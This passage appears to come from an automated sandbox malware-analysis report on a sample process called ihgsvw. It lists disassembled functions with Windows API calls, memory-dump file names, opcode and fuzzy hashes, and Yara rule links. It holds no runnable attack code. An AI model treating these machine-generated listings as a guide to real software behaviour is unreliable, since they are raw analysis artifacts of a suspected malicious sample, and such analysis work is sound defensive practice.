                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C512
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                • String ID:
                • API String ID: 826366716-0
                • Opcode ID: b9d1f5efab63eb1b44ca9045af1163ef8477899bcc889a7f99bafa2621c2e2db
                • Instruction ID: 05b93a1f4fba47762d6f2f28164267bc3cbe4cb2577985a4b56ea8c5cfd17fa1
                • Opcode Fuzzy Hash: b9d1f5efab63eb1b44ca9045af1163ef8477899bcc889a7f99bafa2621c2e2db
                • Instruction Fuzzy Hash: EB616031108251AFD714DF24D8D4E7ABBE5BF84308F14899CF46A8B6A2DB31ED45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C374D5 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32 ref: 00C37592
                • SetWindowLongW.USER32 ref: 00C375A9
                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C375D2
                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C1B4D6,00000000,00000000), ref: 00C375F7
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C37626
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$Long$MessageSendShow
                • String ID:
                • API String ID: 3688381893-0
                • Opcode ID: 239a2b2c2c173a481b78d55847eefb8d7f81a6db8e2b879941b60a2fdd0b3f2a
                • Instruction ID: 18f70112df05744e5c1d87a8f31ee61b30af542efb0a0f77988e33c378efa917
                • Opcode Fuzzy Hash: 239a2b2c2c173a481b78d55847eefb8d7f81a6db8e2b879941b60a2fdd0b3f2a
                • Instruction Fuzzy Hash: FD41EAB5628144BFD739CF68CC49FA97BA5EB0A360F140314F925A72E0C770EE40DA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD23E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: e90faed9b5229262385c0a8942bf1b0c6b223414df0ff05d33a53d472c0f69b3
                • Instruction ID: 18404575921c2539fe901800f0e9f4a5a5c6ba13db513893663e15733a137790
                • Opcode Fuzzy Hash: e90faed9b5229262385c0a8942bf1b0c6b223414df0ff05d33a53d472c0f69b3
                • Instruction Fuzzy Hash: 6041C132A00204AFDB24DF78C881A5DF7E5EF99314F1541EAEA15EB391EA71AD01CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C141CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                • GetInputState.USER32 ref: 00C14225
                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C1427C
                • TranslateMessage.USER32(?), ref: 00C142A5
                • DispatchMessageW.USER32 ref: 00C142AF
                • PeekMessageW.USER32 ref: 00C142C0
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                • String ID:
                • API String ID: 2256411358-0
                • Opcode ID: ef674979b0fd333c8f24d84a7b98d7557ca5dd1d7f9ead352c3ad61ad5144b30
                • Instruction ID: 55b59c710c17e2befc01e5dee363a893ee702a3737c206002ea8d5775efcdc7f
                • Opcode Fuzzy Hash: ef674979b0fd333c8f24d84a7b98d7557ca5dd1d7f9ead352c3ad61ad5144b30
                • Instruction Fuzzy Hash: F831A4705042429EEB2CCB65A809FFA37ECEB17305F44056DE576820A0D6B49AC5EB12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32 ref: 00C021A5
                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C02251
                • Sleep.KERNEL32(00000000,?,?,?), ref: 00C02259
                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C0226A
                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C02272
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessagePostSleep$RectWindow
                • String ID:
                • API String ID: 3382505437-0
                • Opcode ID: 22a5798f73898aa93943c2cf7c2575ace7cad0e107dabf0281e90df8db742681
                • Instruction ID: e993a5b12c0a9ce638e939d48affecad92ebe5e492598b63e12f3d3cfc043f91
                • Opcode Fuzzy Hash: 22a5798f73898aa93943c2cf7c2575ace7cad0e107dabf0281e90df8db742681
                • Instruction Fuzzy Hash: D5317C71900219EFDB14CFA8DD8DB9E7BB5EB14325F104229FA26A72D0C770AA54DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C36065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C360A4
                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C360FC
                • _wcslen.LIBCMT ref: 00C3610E
                • _wcslen.LIBCMT ref: 00C36119
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C36175
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$_wcslen
                • String ID:
                • API String ID: 763830540-0
                • Opcode ID: 5f1deb54ef172efd76e11c83d3315f3a76f364a3bf0b0205154e39c044a12d29
                • Instruction ID: 86371136905912ff6563bf6d0eae276a33a5675c162fdc82ba311f27acecaeba
                • Opcode Fuzzy Hash: 5f1deb54ef172efd76e11c83d3315f3a76f364a3bf0b0205154e39c044a12d29
                • Instruction Fuzzy Hash: 8D218271910218ABDB109FA5CC84AEEBBB8FF05324F148256F925DB185D7718685CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2128D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ForegroundPixelRelease
                • String ID:
                • API String ID: 4156661090-0
                • Opcode ID: 03fa8f1d1b8ba2d578df4f906a6bd869c72ea81d3bd20d44f6359eadfab113d8
                • Instruction ID: 858b76da92742da476e94de42eb001011c6c8a22e2b2092137daa7e352c720d7
                • Opcode Fuzzy Hash: 03fa8f1d1b8ba2d578df4f906a6bd869c72ea81d3bd20d44f6359eadfab113d8
                • Instruction Fuzzy Hash: DF21AE36600214AFD704EF65E885B9EBBF9FF49310B048468F95AD7751CA30EC44DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BDD15D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00BDD166
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDD189
                  • Part of subcall function 00BD3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDD1AF
                • _free.LIBCMT ref: 00BDD1C2
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDD1D1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 27803196b6f782bde2558fda90ae2e5311f228f2e35a20b35195e94c56134fcd
                • Instruction ID: fa889d20765869d8a4cbab51aa2cba96428fc9c2a24c33b9841c2604ae7b0bb9
                • Opcode Fuzzy Hash: 27803196b6f782bde2558fda90ae2e5311f228f2e35a20b35195e94c56134fcd
                • Instruction Fuzzy Hash: 3D0171766012157F2321166A6C88E7FE9ADDEC2B6131502ABFD45E2340FE618C0181B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD3188 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(0000000A,?,?,00BCF66E,00BC547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD318D
                • _free.LIBCMT ref: 00BD31C2
                • _free.LIBCMT ref: 00BD31E9
                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD31F6
                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD31FF
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 05d1fb16940916e01c512ba4e63c0d4bf4b6356a4296eeb916a4f88d11ee05af
                • Instruction ID: db920b997d7eb13b421ed1ff45d24d4920a2f6f042d8f941a39ef4ee688ada08
                • Opcode Fuzzy Hash: 05d1fb16940916e01c512ba4e63c0d4bf4b6356a4296eeb916a4f88d11ee05af
                • Instruction Fuzzy Hash: E701FE7660150267821227366C46F1ED6EADFD1B7072404B7F416A2393FE618D024122
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0F1A7 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                Download Yara Rule
                APIs
                • QueryPerformanceCounter.KERNEL32(?), ref: 00C0F1C3
                • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0F1D1
                • Sleep.KERNEL32(00000000), ref: 00C0F1D9
                • QueryPerformanceCounter.KERNEL32(?), ref: 00C0F1E3
                • Sleep.KERNEL32 ref: 00C0F21F
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: e1b983aa4a35be9bfd7e55ee912177a1dc379fb75ee53adbaf521a77fe40660c
                • Instruction ID: 15779b8966a56d6621f8049299e14c5f8316b1f6abe07ce3e9140bd663a6528e
                • Opcode Fuzzy Hash: e1b983aa4a35be9bfd7e55ee912177a1dc379fb75ee53adbaf521a77fe40660c
                • Instruction Fuzzy Hash: BC018C35C00619DBCF10AFA5EC49BEEBB78FF08711F010069E902B2290CB309695C761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                Download Yara Rule
                APIs
                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?,?,00C00BEE), ref: 00C008BB
                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C008D6
                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C008E4
                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?), ref: 00C008F4
                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C00900
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: From$Prog$FreeStringTasklstrcmpi
                • String ID:
                • API String ID: 3897988419-0
                • Opcode ID: 79e9896bf714a0e23021e633b3dcaed7642337a160404c9e26429a9336cce3fd
                • Instruction ID: 8ba84f5094e9da3d52f08a8593b775feeaacf9726f25bbb6c651b96bb6313eb6
                • Opcode Fuzzy Hash: 79e9896bf714a0e23021e633b3dcaed7642337a160404c9e26429a9336cce3fd
                • Instruction Fuzzy Hash: 6B018F76610218AFDB104F65EC08BAE7BBDEB48752F214124F906D2291DB71EE40CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C064D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 646afa2e45296233b91e00264101fa3367a7f3ef018ccfc536a7bb2e13faae02
                • Instruction ID: 45da730ef24ebb6d88842bda327131839f957281e10ce3786008095f6d1fea6c
                • Opcode Fuzzy Hash: 646afa2e45296233b91e00264101fa3367a7f3ef018ccfc536a7bb2e13faae02
                • Instruction Fuzzy Hash: A601A430510704ABEB205F60ED4FB9A77B8FF10B05F000959B5A7A14E1DBF4AB64CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD2630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00BD264E
                  • Part of subcall function 00BD2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4), ref: 00BD2D6E
                  • Part of subcall function 00BD2D58: GetLastError.KERNEL32(00C71DC4,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4,00C71DC4), ref: 00BD2D80
                • _free.LIBCMT ref: 00BD2660
                • _free.LIBCMT ref: 00BD2673
                • _free.LIBCMT ref: 00BD2684
                • _free.LIBCMT ref: 00BD2695
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 356e4a24f304b6182bf152a3d40da0d5c9415532fea4cb2679d165cb499c78fb
                • Instruction ID: ef06f2058f74c770a7e4e37da7c5f6fdedf28a171acf98020f47095538d7b126
                • Opcode Fuzzy Hash: 356e4a24f304b6182bf152a3d40da0d5c9415532fea4cb2679d165cb499c78fb
                • Instruction Fuzzy Hash: 47F090709002908B8711AFA9BC05B4C7FA9FB297603540297F419873B1DB704983AFC0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD12D7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: __freea$_free
                • String ID: a/p$am/pm
                • API String ID: 3432400110-3206640213
                • Opcode ID: 9a15cd59398821059020030e7d80064a5e1f55cde8370148592cb06ddbcd249f
                • Instruction ID: 5bb81684a6874d64a4e70d6d636b22d12073c8f888263f0ed1957266e1ede65c
                • Opcode Fuzzy Hash: 9a15cd59398821059020030e7d80064a5e1f55cde8370148592cb06ddbcd249f
                • Instruction Fuzzy Hash: B0D1D175A00206AADB289F6CC885BBAF7F5EF05310F2849DBE5029B351F2359D80CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C34817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C3489F
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C348B3
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C348D7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
